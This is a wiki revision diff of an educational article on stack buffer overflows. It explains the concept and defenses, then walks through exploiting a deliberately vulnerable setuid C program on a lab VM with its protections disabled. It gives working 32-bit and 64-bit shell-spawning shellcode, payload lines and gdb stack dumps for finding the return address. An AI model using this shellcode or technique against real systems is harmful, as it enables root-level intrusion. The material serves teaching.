Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Buffer overflow"

From NetSec
Jump to: navigation, search
(Containers)
m (removed {{social}} because cancer)
 
(47 intermediate revisions by 8 users not shown)
Line 1: Line 1:
'''Buffer overflow''', or '''Buffer Overrun''' is a software error triggered when a program doesn't adequately control the amount of data that is copied over the [[buffer]], so if this amount exceeds the preassigned capacity, remaining bytes are stored in adjacent memory areas by overwriting its original content. This may lead to arbitrary code execution and allow access to a vulnerable system.  
+
'''Buffer overflow''', or '''Buffer Overrun''' is a [[application|software]] error triggered when a program does not adequately control the amount of data that is copied over the [[buffer]], if this amount exceeds the preassigned capacity, remaining [[byte]]s are stored in adjacent memory areas by overwriting its original content. This can be exploited by overwriting a fuction's [[return address]] to cause arbitrary code execution and allow access to a [[vulnerability|vulnerable]] system.  
 
+
{{info|This is an introductory article to buffer overflows.  [[Bleeding Life]] is an example of a project containing buffer overflows that bypass [[ASLR]] and [[DEP]] for Windows 7.}}{{prereq|[[Assembly Basics|assembly]] and [[machine code]].}}
 +
<font size="-2">Special thanks to [[User:Teknical|Teknical]] for his contributions to this article.</font>
 
==Description==
 
==Description==
A computer receives [[input]], remembers what to do with the [[input]], and then does it. If an attacker on the internet could control the memory of a computer, the computer would remember the wrong thing to do, and do it because it doesn't know any better. This is what happens during a buffer overflow attack.
+
A computer receives [[input]], recalls what to do with the [[input]], and then does it. If an attacker on the internet could control the memory of a computer, the computer would remember the wrong thing to do, and execute it because it doesn't know any better. This is what happens during a buffer overflow attack.
 +
 
 +
The memory of a computer is much like a post office. Each piece of mail goes to a mailbox or a P.O. box, and each P.O. box can only hold one piece of mail at a time. Suppose for a moment that the post office that represents the computer's memory has 500 P.O. boxes. Boxes 1-200 are for data that the user sends into the computer, and boxes 201-500 hold instructions for what to do with that data.
 +
If a user sends in 300 pieces of data or mail, there are two scenarios:
 +
1. A secure program would tell the user "I can only hold 200 pieces, I'm not taking any more mail".
 +
2. An insecure program would simply take all the data into boxes 1-300.
 +
 
 +
In the insecure scenario, when the computer remembers what to do, it lands on P.O. box 201. If the user was an attacker, malicious instructions at P.O. box 201 would be executed! This is why the buffer overflow is such a dangerous [[vulnerability]]. {{notice|Though it is a dying attack vector, the buffer overflow is still very prominent today.}}
  
The memory of a computer is much like a post office. Each piece of mail goes to a mailbox or a P.O. box, and each P.O. box can only hold one piece of mail at a time. Suppose for a moment that the post office that represents the computer's memory has 500 P.O. boxes. Boxes 1-200 are for data that the user sends into the computer, and boxes 201-500 hold instructions for what to do with that data. Now what happens if a user sends in 300 pieces of data or mail? Well a secure program would tell the user "I can only hold 200 pieces, I'm not taking any more mail", but an insecure program would simply take all the data into boxes 1-300. So now, when the computer remembers what to do, it lands on P.O. box 201. If the user was an attacker, malicious instructions at P.O. box 201 would be executed! This is why the buffer overflow is such a dangerous [[vulnerability]]. {{notice|Though it is a dying attack vector, the buffer overflow is still very prominent today.}}
 
 
In all actuality, there is a [[return address]] that the computer uses to remember where its instructions are. So if an attacker filled up P.O. boxes 1-201, and 201 contained the return address, and the attacker changed the return address to P.O. box 1, the computer would execute the data instead of just keeping it in memory. This means that the attacker has to know enough about the system to know what address the malicious instructions are going to, because otherwise the attacker will not know the correct return address to put into P.O. Box 201. This means that the attacker has to have precise aim, or the attack will be unsuccessful.
 
In all actuality, there is a [[return address]] that the computer uses to remember where its instructions are. So if an attacker filled up P.O. boxes 1-201, and 201 contained the return address, and the attacker changed the return address to P.O. box 1, the computer would execute the data instead of just keeping it in memory. This means that the attacker has to know enough about the system to know what address the malicious instructions are going to, because otherwise the attacker will not know the correct return address to put into P.O. Box 201. This means that the attacker has to have precise aim, or the attack will be unsuccessful.
{{protip|Debuggers such as '''IDA Pro, kgdb, gdb''', and '''ollydbg''' are very helpful for finding the correct [[return address|return pointer]] for your [[shellcode]].}}
+
{{protip|Debuggers such as '''IDA Pro, kgdb, gdb''', and '''ollydbg''' are very helpful for finding the correct [[return address|return pointer]] for the [[shellcode]].}}
  
 
==Defenses==
 
==Defenses==
 
===[[ASLR]]===
 
===[[ASLR]]===
There are multiple defenses that have been incorporated into runtime in an attempt to fight buffer overflows and prevent them from taking place. One of the most recent defense mechanisms is called [[ASLR]], which stands for [[ASLR|Address Space Layout Randomization]]. It makes it so every time the computer reboots and every time a program runs, the address space that it lives in changes. In other words, following our mailbox analogy, the return address will never be in the same mailbox. The point of this is to try to prevent an attacker from performing a buffer overflow exploit because the attacker can never aim properly. Unfortunately, attackers have discovered something called "Magic Numbers", which tricks the error handler for programs and allows an attacker to aim his attack correctly without having to know a return address.
+
There are multiple defenses that have been incorporated into runtime in an attempt to fight buffer overflows and prevent them from taking place. One of the most recent defense mechanisms is called [[ASLR]], which stands for [[ASLR|Address Space Layout Randomization]]. It makes it so every time the computer reboots and every time a program runs, the address space that it lives in changes. In other words, following the mailbox analogy, the return address will never be in the same mailbox. The point of this is to try to prevent an attacker from performing a buffer overflow exploit because the attacker can never aim properly. Unfortunately, attackers have discovered something called "Magic Numbers", which tricks the error handler for programs and allows an attacker to aim his attack correctly without having to know a return address.  Some [[Bleeding Life|key failures]] of [[ASLR]] include that certain [[Operating System]]s (such as '''Windows 7''') dynamically disable it for non-compatible libraries.
  
 
===[[DEP]]===
 
===[[DEP]]===
Another defense mechanism that has been implemented is called [[DEP]], which stands for [[DEP|Data Execution Prevention]]. This is an attempt to prevent the return address from being changed into something in the same memory space as the data, and also prevent [[machine code]] (the code that buffer overflows are crafted in) from being placed into data segments. To combat this defense mechanism, attackers have developed ASCII and [[ascii shellcode|polymorphic ASCII]] [[machine code]]. ASCII and Polymorphic ASCII code looks like normal user [[input]] instead of [[machine code]].
+
Another defense mechanism that has been implemented is called [[DEP]], which stands for [[DEP|Data Execution Prevention]]. This is an attempt to prevent the return address from being changed into something in the same memory space as the data, and also prevent [[machine code]] (the code that buffer overflows are crafted in) from being placed into data segments. [[Return_Oriented_Programming_(ROP)]] is used when defeating modern [[DEP]].
 +
 
 +
To combat additional filters, attackers have developed [[alphanumeric shellcode|polymorphic and multi-architecture alphanumeric shellcode]] and [[ascii shellcode|polymorphic ASCII]] [[machine code]] and [[shellcode]]s. ASCII and Polymorphic ASCII code looks to many filters like normal user [[input]] instead of malicious [[binary]] or [[machine code]].
  
 
===Containers===
 
===Containers===
An even further defense mechanism is called a container, which is another layer of [[DEP|Data Execution Prevention]]. The container attempts to identify all possible results of code from data within the buffer (or the data segment) and then prevent the [[applications|application]] from calling external functions in shared objects from the inside of the buffer. A version of this has been implemented in Cisco Security Agent, or [[CSA]].  Linux's GrSec and PaX kernel patches also implement their own version of contained memory space.  {{notice|As attacks become more and more sophisticated, so do hardware and software prevention mechanisms.  Notice we're not keeping up?  Visit our [[IRC]] and tell us about it!}}
+
An even further defense mechanism is called a container, which is another layer of [[DEP|Data Execution Prevention]]. The container attempts to identify all possible results of code from data within the buffer (or the data segment) and then prevent the [[applications|application]] from calling external functions in shared objects from the inside of the buffer. A version of this has been implemented in Cisco Security Agent, or [[CSA]].  Linux's GrSec and PaX kernel patches also implement their own version of contained memory space.  {{notice|As attacks become more and more sophisticated, so do hardware and software prevention mechanisms.  Notice something outdated?  Visit our [[IRC]] and tell us about it!}}
  
===Bypassing Protections===
+
===Bypassing protections===
 
So with [[CSA]], [[ASLR]], and Operating-System supplied [[DEP]], successfully performing a buffer overflow exploit against a system can be extremely difficult. Any attacker who makes it to the point where [[CSA]] catches it is already very advanced. To successfully subvert [[ASLR]], [[DEP]] and containers one must use [[polymorphic]] [[ascii shellcode|ASCII shellcode]] and return-oriented programming.  Return-oriented programming is used to evade the NX bit and XD bits, a type of hardware DEP implemented directly into processors.  [[machine code|Machine code]] that self-modifies as well as looks like standard user [[input]] and has all of its own functions built into its own code, in a return-oriented fashion, is required to bypass modern-day host level buffer overflow defense standards.  The return address must always be specified in normal hexadecimal format, so it will usually look like some really funny characters, like squares or like strange symbols. The [[IDS]] or [[HIDS]] Context Buffer will show four squares or symbols on the end in a real buffer overflow exploit attempt on 32-bit systems, and eight squares or symbols on the end on a 64-bit system.   
 
So with [[CSA]], [[ASLR]], and Operating-System supplied [[DEP]], successfully performing a buffer overflow exploit against a system can be extremely difficult. Any attacker who makes it to the point where [[CSA]] catches it is already very advanced. To successfully subvert [[ASLR]], [[DEP]] and containers one must use [[polymorphic]] [[ascii shellcode|ASCII shellcode]] and return-oriented programming.  Return-oriented programming is used to evade the NX bit and XD bits, a type of hardware DEP implemented directly into processors.  [[machine code|Machine code]] that self-modifies as well as looks like standard user [[input]] and has all of its own functions built into its own code, in a return-oriented fashion, is required to bypass modern-day host level buffer overflow defense standards.  The return address must always be specified in normal hexadecimal format, so it will usually look like some really funny characters, like squares or like strange symbols. The [[IDS]] or [[HIDS]] Context Buffer will show four squares or symbols on the end in a real buffer overflow exploit attempt on 32-bit systems, and eight squares or symbols on the end on a 64-bit system.   
 
{{Info|Learning to [[Assembly_Basics#Counting|count]] in hex and [[Bitwise Math|bitwise math]] will tell you more about the sizes.}}
 
{{Info|Learning to [[Assembly_Basics#Counting|count]] in hex and [[Bitwise Math|bitwise math]] will tell you more about the sizes.}}
  
==Maximum Effectiveness==
+
==Maximum effectiveness==
Sometimes attackers and pen-testers alike use what is called [[Second Stage Shellcode]]. Many times [[firewall]] rules will prevent any connections outgoing from a server machine and prevent all incoming connections except for connections on the specified server port. Because of this, attackers use what is called [[Second Stage Shellcode]] to first find the connection that the exploit originated from, and then send the output of the arbitrary functions back along the first connection. This is done to circumvent [[Firewall|firewalls]] and prevent a [[firewall]] from blocking a connection.
+
Many times [[firewall]] rules will prevent any connections outgoing from a server machine and prevent all incoming connections except for connections on the specified server port. Because of this, attackers use what is called '''Second Stage Shellcode''' to first find the connection that the exploit originated from, and then send the output of the arbitrary functions back along the first connection. This is done to circumvent [[Firewall|firewalls]] and prevent a [[firewall]] from blocking a connection.
  
Buffer overflows can be used remotely to gain partial or total systems access, or they can be used locally to escalate privileges and permissions segments inside of the operating system in order to gain system or root level access. The real threat that a buffer overflow causes is what is called the "[[Zero-Day attack]]", also known as a buffer overflow that the [[security]] world has never seen before. [[Zero-Day attack|Zero-Day]] or [[Zero-Day attack|0day]] attacks are the most devastating to the [[security industry]], causing [[worms]], [[viruses]], and sometimes even hundreds of thousands of systems to be compromised in a single day.
+
Buffer overflows can be used remotely to gain partial or total systems access, or they can be used locally to escalate privileges and permissions segments inside of the operating system in order to gain system or root level access. The real threat that a buffer overflow causes is what is called the "[[Zero-Day attack]]", also known as a buffer overflow that the [[security]] world has never seen before. [[Zero-Day attack|Zero-Day]] or [[Zero-Day attack|0day]] attacks are the most devastating to the '''security industry''', causing worms, [[viruses]], and sometimes even hundreds of thousands of systems to be compromised in a single day.
  
 
==Causes==
 
==Causes==
Buffer overflows exist because a combination of insecure language [[Compiler|compilers]], insecure [[Programmer|programmers]] and bad cpu architectures that keep [[return address]] from a function call in the stack. A [[programmer]] should be able to check [[input]] to the data segment with relative ease, however often times coders are either ignorant of the problem, overlook the flaw, or sometimes even a disgruntled employee might code the [[vulnerability]] into an application himself for his own personal gain after the application goes [[production]] level.
+
Buffer overflows exist because a combination of insecure language [[Compiler|compilers]], insecure [[Programmer|programmers]] and bad cpu architectures that keep [[return address]] from a function call in the stack. A [[programmer]] should be able to check [[input]] to the data segment with relative ease, however often times coders are either ignorant of the problem, overlook the flaw, or sometimes even a disgruntled employee might code the [[vulnerability]] into an [[applications|application]] himself for his own personal gain after the application goes to [[production]]. {{protip|Bench-marking and pen-testing software in an as-you-develop fashion for proper quality assurance and control can help '''prevent attacks''' from a '''malicious insider'''.}}
  
 
==Example==
 
==Example==
 
+
{{notice|This example is for a '''32 bit [[Linux]] operating system''' and the steps below may vary per your distribution and installation.}}
 
+
===Disabling [[ASLR]]===
Let's first disable [[ASLR]].  This makes it easier for our proof of concept to be successful.  There are other methods of bypassing ASLR, but we will not cover them here.
+
The first step is to disable [[ASLR]].  This allows the featured proof of concept to be successful.  There are other methods of bypassing ASLR, but will not be covered here.
  
 
   teknical@teknical-vm:~$ sudo -s
 
   teknical@teknical-vm:~$ sudo -s
Line 42: Line 51:
 
   teknical@teknical-vm:~$  
 
   teknical@teknical-vm:~$  
  
 +
===Test application===
 +
The test application is below.  Note that there is a statically allocated buffer of 100 bytes.  This is what will be overflowed.  The use of strcpy on an unchecked buffer is a common procedure.  Its use is recommended to prevent applications from being exploited.
  
Our test application is below.  Notice we have a statically allocated buffer of 100 bytes.  This is what we will be overflowing.  The use of strcpy on an unchecked buffer is actually very common.  It is something you should attempt to stay away from to prevent your own applications from being exploited.
+
====bof.c====
 
+
{{code|text=<source lang="c">
  teknical@teknical-vm:~$ cat bof.c
+
 
   #include <stdlib.h>
 
   #include <stdlib.h>
 
   #include <stdio.h>
 
   #include <stdio.h>
Line 54: Line 64:
 
   strcpy(buffer,  argv[1]);
 
   strcpy(buffer,  argv[1]);
 
   return 0;
 
   return 0;
   }
+
   }</source>}}
  
Lets compile our test application.  We will use the -g option of gcc to tell the linker to include debugging symbols, this makes it easier for us to debug during our attempts to achieve code execution.
+
====Compiling====
 +
 
 +
For compilation, use the -g option of gcc to include debugging symbols in the linker, resulting in easier code execution.
  
 
   teknical@teknical-vm:~$ gcc -g bof.c -o bof
 
   teknical@teknical-vm:~$ gcc -g bof.c -o bof
  
Now that our test application is compiled, we can attempt to trigger the vulnerability. We know that our buffer can only hold 100 bytes, so lets test by passing it 104 bytes, which should cause an overflow. We use ruby to dynamically build a 104 byte string.  You can also use perl if you prefer.
+
Following compilation, the vulnerability can then be triggered. This example has a buffer of 100 bytes, thus a good test is 104 bytes, which will result in an overflow. Ruby is used to dynamically build a 104 byte string with perl another option.  
 
+
  
 +
=====Potential compile-time protections=====
 
   teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 
   teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 
   *** stack smashing detected ***: ./bof terminated
 
   *** stack smashing detected ***: ./bof terminated
 +
{{quote|By default on newer versions of gcc and other modern compilers, code is sanitized and protected at compile time.|Teknical}}
  
 +
=====Solution for test application=====
 +
The test application must be compiled without this sanitation. Removing the stack protection from program is done by the utilization of -fno-stack-protector option with gcc.
  
Wait...What is this.  By default on newer versions of gcc and other modern compilers, they include code that serves to protect the stack. We will not go into detail about that in this lession.
+
  teknical@teknical-vm:~$ gcc -g -fno-stack-protector bof.c -o bof
  
We need to compile our test application without the stack protectionThis can be done by adding the -fno-stack-protector option to gcc.
+
===Testing===
 +
Setuid binary is used for this example to ensure the retrieval of a root shellSet up the bof binary for setuid below:
  
   teknical@teknical-vm:~$ gcc -g -fno-stack-protector bof.c -o bof
+
   teknical@teknical-vm:~$ sudo chown root:root ./bof
 +
  teknical@teknical-vm:~$ sudo chmod 4755 ./bof
  
Now that we have recompiled our application with no stack protection, we can again attempt to trigger the vulnerability. We will start at 104 bytes and move up until we trigger the vulnerability.
+
====On x86====
 +
Following the compilation of the application, the vulnerability can be triggered once again. As stated earlier, 104 bytes are used and this is increased until the vulnerability is triggered.
  
 
   teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 
   teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
Line 80: Line 98:
 
   Segmentation fault
 
   Segmentation fault
  
Notice that it took 112 bytes to successfully overwrite the saved ebp of the running application.  We are now ready to attempt exploitation.  Note, that we will need 116 bytes to overwrite the return address on the stack.
+
Note that it took 112 bytes to successfully overwrite the saved ebp of the running application.  The system is now prepared for attempts of exploitation.  Note, that 116 bytes are required to overwrite the return address on the stack.
 +
{{notice|These extra [[byte|bytes]] are other [[Assembly_Basics#Instructions_.26_Concepts|registers]] and sometimes [[Assembly_Basics#Special_Registers|special registers]].  These are also overwritten.}}
  
For this example, we will be using a setuid binary, to ensure we gain a root shell.  Set up our bof binary for setuid below.
+
====On x86-64====
  
   teknical@teknical-vm:~$ sudo chown root:root ./bof
+
This number will vary on x86-64...
   teknical@teknical-vm:~$ sudo chmod 4755 ./bof
+
 
 +
   xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 100'`
 +
  xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 110'`
 +
   xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 120'`
 +
  Segmentation fault
 +
  xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 119'`
 +
 
 +
On x86-64 it takes 120 bytes to trigger a segfault. Another important difference is that the return address will be placed in the 8 byte rip register, not the 4 byte eip register.
 +
 
 +
===Disabling DEP===
 +
[[DEP]] is another protection scheme which prevents code in the stack from being executed. 'execstack' is used to check the status of and set the binary to have an executable stack.
  
[[DEP]] is another protection scheme which prevents code in the stack from being executed.  We can use 'execstack' to check the status of and set our binary to have an executable stack.
+
{{quote|Gcc's `-z execstack' parameter can be used to set the stack as executable at compile time|Xochipilli}}
  
 
The -q option will query the current status.
 
The -q option will query the current status.
Line 94: Line 123:
 
   - bof
 
   - bof
  
Notice the -, which means that our application will NOT have an executable stack.  This will prevent successful exploitation.
+
Notice the -, which means that the application will NOT have an executable stack.  This will prevent successful exploitation.
  
We can use the -s option to set our binary to allow execution on the stack.
+
The -s option is used to set the binary to allow execution on the stack.
  
 
   teknical@teknical-vm:~$ sudo execstack -s bof
 
   teknical@teknical-vm:~$ sudo execstack -s bof
  
If we query again, we will notice an X in its place, which means that our stack is now executable.
+
If queried again, an X will appear in its place, which means that the stack is now executable.
  
 
   teknical@teknical-vm:~$ sudo execstack -q bof
 
   teknical@teknical-vm:~$ sudo execstack -q bof
 
   X bof
 
   X bof
  
 +
===Debugging===
 +
{{notice|'''gdb''' is required for the following sections, installed using the package manager}}
 +
The next step is to start up gdb and begin debugging.
  
Ok, back to the goods.  Lets start up gdb and begin debugging.
+
====Shellcode analysis====
 +
{{info|[[Shellcode]] is [[machine code]] for a flat binary execution during exploitation of a buffer overflow exploit.}}
  
We will use `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'` as the argument to our test application.
+
=====On x86=====
  
Lets examine this.
+
The following will be used as the argument to the test application:
  
   `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41 \x41\x41"'`
+
   '''`ruby -e 'print "\x90"*60,'''
 +
  '''"\xeb\x1f\x5e\x89\x76\x08'''
 +
  '''\x31\xc0\x88\x46\x07\x89'''
 +
  '''\x46\x0c\xb0\x0b\x89\xf3'''
 +
  '''\x8d\x4e\x08\x8d\x56\x0c'''
 +
  '''\xcd\x80\x31\xdb\x89\xd8'''
 +
  '''\x40\xcd\x80\xe8\xdc\xff'''
 +
  '''\xff\xff/bin/sh", "A"*7,'''
 +
  '''"\x41\x41\x41\x41"'` '''
  
The shell code we will be using is 45 bytes long.  It is a setuid + drop shell.
+
There are a few things to be noted examining the shellcode above.{{notice|The backticks are [[bash]] command substitution as described in the [[bash book]].}}The shell code used is 45 bytes long.  It is a setuid() + /bin/sh shellcode:
  
   \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
+
   \xeb\x1f\x5e\x89\x76\x08
 +
  \x31\xc0\x88\x46\x07\x89
 +
  \x46\x0c\xb0\x0b\x89\xf3
 +
  \x8d\x4e\x08\x8d\x56\x0c
 +
  \xcd\x80\x31\xdb\x89\xd8
 +
  \x40\xcd\x80\xe8\xdc\xff
 +
  \xff\xff/bin/sh
  
We know that we need at least 112 bytes to overwrite ebp, and another 4 to overwrite the return address.  We will pad our shellcode with 60 NOPs.  60 + 45 = 105.  We know that we still need 7 bytes to overwrite ebp and another 4 to overwrite the return address.  I prefer to use 0x41/'A' for this portion, because it easier to debug with. We add another 7 bytes of 'A', and then 4 on the end for our return address.  60 + 45 + 7 + 4 = 116, which is the number of bytes we need to overwrite the return address, and successfully exploit our target.
+
Following previous knowledge that at least 112 bytes are required to overwrite ebp, and another 4 to overwrite the return address.  The shellcode is padded with 60 NOPs.  60 + 45 = 105.  It is also known that 7 bytes are required to overwrite ebp and another 4 to overwrite the return address.  0x41/'A' is recommended for this portion because it easier to debug with. Another 7 bytes of 'A', are added and then 4 on the end for the return address.  60 + 45 + 7 + 4 = 116, which is the number of bytes needed to overwrite the return address and successfully exploit the target.
  
 +
=====On x86-64=====
  
Start gdb.
+
The following shellcode is used to spawn a shell:
 +
 
 +
  "\x48\x31\xd2"                                  // xor    %rdx, %rdx
 +
  "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov    $0x68732f6e69622f2f, %rbx
 +
  "\x48\xc1\xeb\x08"                              // shr    $0x8, %rbx
 +
  "\x53"                                          // push  %rbx
 +
  "\x48\x89\xe7"                                  // mov    %rsp, %rdi
 +
  "\x50"                                          // push  %rax
 +
  "\x57"                                          // push  %rdi
 +
  "\x48\x89\xe6"                                  // mov    %rsp, %rsi
 +
  "\xb0\x3b"                                      // mov    $0x3b, %al
 +
  "\x0f\x05";                                    // syscall
 +
 
 +
Or:
 +
 
 +
  \x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05
 +
 
 +
This shellcode is 30 bytes long. 120 bytes + 8 bytes are required for the return address. To start, use a 60 byte nopsled + 30 byte shellcode + 30 bytes of padding + 8 byte return address, totaling 128 bytes.
 +
 
 +
====Finding the [[return address]]====
 +
* '''Starting gdb'''
  
 
   teknical@teknical-vm:~$ gdb -q ./bof
 
   teknical@teknical-vm:~$ gdb -q ./bof
 
   Reading symbols from /home/teknical/bof...done.
 
   Reading symbols from /home/teknical/bof...done.
  
Set a breakpoint inside of our "main" function.
+
* '''Setting a breakpoint inside of the "main" function'''
  
 
   (gdb) break main
 
   (gdb) break main
 
   Breakpoint 1 at 0x80483ed: file bof.c, line 7.
 
   Breakpoint 1 at 0x80483ed: file bof.c, line 7.
  
Start our application with the command line we discussed above.
+
* '''Starting the application with the command line as discussed above.'''
 +
 
 +
=====On x86=====
  
   (gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
+
   (gdb) r `ruby -e 'print "\x90"*60, "[insert our shellcode here]", "A"*7, "\x41\x41\x41\x41"'`
   Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
+
   Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60,  
 +
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56
 +
  \x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
  
 
   Breakpoint 1, main (argc=2, argv=0xbffff474) at bof.c:7
 
   Breakpoint 1, main (argc=2, argv=0xbffff474) at bof.c:7
 
   7 strcpy(buffer,  argv[1]);
 
   7 strcpy(buffer,  argv[1]);
 
+
{{quote|Viewing the main function, lets examine the stack.  It is known that at least 116 bytes on the stack are required, 200 bytes are used to make sure all the required space is presentAnother thing to look for is the address of the shell code on the stack.|Teknical}}
Now that we are in our main function, lets examine the stack.  We know that we have at least 116 bytes on the stack, so lets examine 200 bytes to make sure we have all we needWe are looking for the address of our shell code on the stack.
+
 
+
 
   (gdb) x/200x $esp
 
   (gdb) x/200x $esp
 
   0xbffff340: 0x00119222 0xbffff3e4 0x080481f4 0xbffff3d8
 
   0xbffff340: 0x00119222 0xbffff3e4 0x080481f4 0xbffff3d8
Line 165: Line 235:
 
   0xbffff490: 0xbffff6be 0xbffff70f 0xbffff721 0xbffff74b
 
   0xbffff490: 0xbffff6be 0xbffff70f 0xbffff721 0xbffff74b
 
   0xbffff4a0: 0xbffff76b 0xbffff779 0xbffffc1a 0xbffffc40
 
   0xbffff4a0: 0xbffff76b 0xbffff779 0xbffffc1a 0xbffffc40
  ---Type <return> to continue, or q <return> to quit---
 
 
   0xbffff4b0: 0xbffffc52 0xbffffcae 0xbffffce0 0xbffffceb
 
   0xbffff4b0: 0xbffffc52 0xbffffcae 0xbffffce0 0xbffffceb
 
   0xbffff4c0: 0xbffffd17 0xbffffd64 0xbffffd7a 0xbffffd89
 
   0xbffff4c0: 0xbffffd17 0xbffffd64 0xbffffd7a 0xbffffd89
Line 186: Line 255:
 
   0xbffff5d0: 0xb8fc08c0 0xd3d76e6a 0x693bf638 0x00363836
 
   0xbffff5d0: 0xb8fc08c0 0xd3d76e6a 0x693bf638 0x00363836
 
   0xbffff5e0: 0x00000000 0x6d6f682f 0x65742f65 0x63696e6b
 
   0xbffff5e0: 0x00000000 0x6d6f682f 0x65742f65 0x63696e6b
   0xbffff5f0: 0x622f6c61 0x9000666f '''0x90909090 0x90909090'''
+
   0xbffff5f0: 0x622f6c61 0x9000666f '''0x90909090 0x90909090
 
   '''0xbffff600: 0x90909090 0x90909090 0x90909090 0x90909090'''
 
   '''0xbffff600: 0x90909090 0x90909090 0x90909090 0x90909090'''
 
   '''0xbffff610: 0x90909090 0x90909090 0x90909090 0x90909090'''
 
   '''0xbffff610: 0x90909090 0x90909090 0x90909090 0x90909090'''
  ---Type <return> to continue, or q <return> to quit---
 
 
   '''0xbffff620: 0x90909090 0x90909090 0x90909090 0x90909090'''
 
   '''0xbffff620: 0x90909090 0x90909090 0x90909090 0x90909090'''
 
   '''0xbffff630: 0xeb909090 0x76895e1f 0x88c03108 0x46890746'''
 
   '''0xbffff630: 0xeb909090 0x76895e1f 0x88c03108 0x46890746'''
Line 195: Line 263:
 
   '''0xbffff650: 0x80cd40d8 0xffffdce8 0x69622fff 0x68732f6e'''
 
   '''0xbffff650: 0x80cd40d8 0xffffdce8 0x69622fff 0x68732f6e'''
  
We are looking for our shellcode on the stack.  The easiest thing to do here, is look for our NOPs. We need to find the address of our NOPs so that we can use this as the return address on the stack.  This will cause execution to resume with our shell code once the function returns.
+
The next step is to find the shellcode on the stack.  The easiest thing to do here is to look for the NOPs. The address of the NOPs is required so this can be used as the return address on the stack.  This will cause execution to resume with the shell code once the function returns.
 +
{{protip|Advanced attacks include [[ascii shellcode]] for maximum evasion.}}
  
Above we can see our NOPS starting at 0xbffff5f8. We will actually be using 0xbffff610 since its a clean address. We need to arrange this in little endian format. "\x10\xf6\xff\xbf"
+
Note the NOPS above starting at 0xbffff5f8. 0xbffff610 will be used since it is a cleaner address. This can be arranged in little endian format: "\x10\xf6\xff\xbf"
  
Lets clear our breakpoint and restart our application with the same command line argument, but replace the "\x41\x41\x41x\x41" at the end of our argument with our return address of "\x10\xf6\xff\xbf"
+
=====On x86-64=====
 +
 
 +
  (gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68
 +
  \x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x41\x41
 +
  \x41\x41\x41\x41\x41\x41"'`
 +
  Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb
 +
  \x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b
 +
  \x0f\x05", "A" x 30, "\x41\x41\x41\x41\x41\x41\x41\x41"'`
 +
  (gdb) x/400x $rsp
 +
{{Quote|I truncated this cause it was huge|Xochipilli}}
 +
  ...
 +
  0x7fffffffe510: 0x00000064 0x00000000 0x00000003 0x00000000
 +
  0x7fffffffe520: 0x00400040 0x00000000 0x00000004 0x00000000
 +
  0x7fffffffe530: 0x00000038 0x00000000 0x00000005 0x00000000
 +
  0x7fffffffe540: 0x00000008 0x00000000 0x00000007 0x00000000
 +
  0x7fffffffe550: 0xf7ddd000 0x00007fff 0x00000008 0x00000000
 +
  0x7fffffffe560: 0x00000000 0x00000000 0x00000009 0x00000000
 +
  0x7fffffffe570: 0x00400400 0x00000000 0x0000000b 0x00000000
 +
  0x7fffffffe580: 0x000003e8 0x00000000 0x0000000c 0x00000000
 +
  0x7fffffffe590: 0x000003e8 0x00000000 0x0000000d 0x00000000
 +
  0x7fffffffe5a0: 0x000003e8 0x00000000 0x0000000e 0x00000000
 +
  0x7fffffffe5b0: 0x000003e8 0x00000000 0x00000017 0x00000000
 +
